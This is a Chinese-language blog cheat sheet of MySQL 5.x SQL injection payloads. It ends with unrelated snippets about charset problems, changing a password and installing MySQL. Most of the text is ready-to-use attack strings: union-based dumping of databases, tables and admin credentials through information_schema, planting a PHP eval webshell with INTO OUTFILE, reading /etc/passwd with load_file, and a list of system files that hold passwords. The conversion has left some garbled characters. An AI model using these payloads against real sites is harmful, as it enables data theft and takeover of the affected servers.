MySql 5 x注入語句總結

2021-06-10 06:51:36 字數 2354 閱讀 5475

猜字段數, 返回正常說明字段數大於當前值.


order by num--

暴使用者:資料庫:版本

and 1=2 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,...,n--

檢視許可權

and ord(mid(user(),1,1))=114--

返回正常說明是root許可權.

mysql 5以上版本多了乙個information_schema表, 裡面儲存了所有的資料庫資訊, 利用這個就不用猜表名列名了, 可以直接暴出來

暴庫名:

and 1=2 union select 1,schema_name,2,3,4,5,6,7 from information_schema.schemata limit 0,1--
其中limit 0,1表示從第0個開始取一條記錄..limit 1,1就是從第1個取一條記錄,  遞增就可以得到所有的庫名.

暴表名:

and 1=2 union select 1,table_name,2,3,4,5,6,7 from information_schema.tables where table_schema=0x61646d696e limit 0,1--

其中0x61646d696e是admin的十六進製制, 意思就是列出庫admin中的表名.

暴列名:

and 1=2 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=0x61646d696e limit 0,1--

列出表admin中的列名.

有了以上資料, 就可以直接得到想要的資料了...

and 1=2 union select 1,concat(id,0x3a,username,0x3a,password),3,4,5,6,7 from admin.admin limit 0,1--

查詢admin庫中admin表id,username,password欄位的值.

直接寫馬(root許可權)

條件:1、知道站點物理路徑

2、有足夠大的許可權(可以用select …. from mysql.user測試)

3、magic_quotes_gpc()=off

select '<?php eval($_post[cmd])?>' into outfile '物理路徑'


and 1=2 union all select 一句話hex值 into outfile '路徑'

load_file()函式

使用方式:

and 1=2 union select 1,replace(load_file(0x2f6574632f706173737764),0x3c,0x20),3,4,5,6,7--
0x2f6574632f706173737764 是要查詢的檔案的

絕對路徑的十六進製制

常用的路徑:

/etc/sysconfig/iptables //防火牆規則策略

/etc/httpd/conf/httpd.conf //apache配置檔案

/etc/sysdonfig/network-scripts/ifcfg-eth0 //檢視ip

/etc/my.conf //mysql的配置檔案

/etc/redhat-release //系統版本

/etc/issue

/etc/issue.net

c:\mysql\data\mysql\user.myd //儲存了mysql.user表中的資料庫連線密碼

c:\program files\rhinosoft.com\serv-u\servudaemon.ini //儲存了虛擬主機**路徑和密碼

c:\program files\serv-u\servudaemon.ini

c:\windows\my.ini //mysql配置檔案

c:\windows\system32\inetsrv\metabase.xml //iis配置檔案

mysql 5亂碼 MySQL 5 x亂碼問題解決

mysql是一款常用的開源資料庫軟體,但是對於初次使用者好像並不是太友好,mysql5.x的版本中預設字符集是latin1也就是我們所知道的iso 8859 1字符集,這個字符集編碼並沒有包含漢字,所以我們在使用的時候漢字會出現亂碼情況,通過修改資料庫預設字符集即可解決。進入mysql命令列 mys...

MySQL 5 x 命令列修改密碼

一 如何在已知密碼的情況下修改mysql的使用者密碼呢?use mysql select from user 修改密碼 update user set password password 你的密碼 where user root 也可分配許可權賬戶 grant select on test.empl...

Linux 斷網安裝MySQL5 x操作步驟

通過xftp或者其他工具上傳到 usr local目錄下面 然後開始解壓和建立目錄 cd usr local tar zxvf mysql 5.7.25 linux glibc2.12 x86 64.tar.gz mv mysql 5.7.25 linux glibc2.12 x86 64 mysq...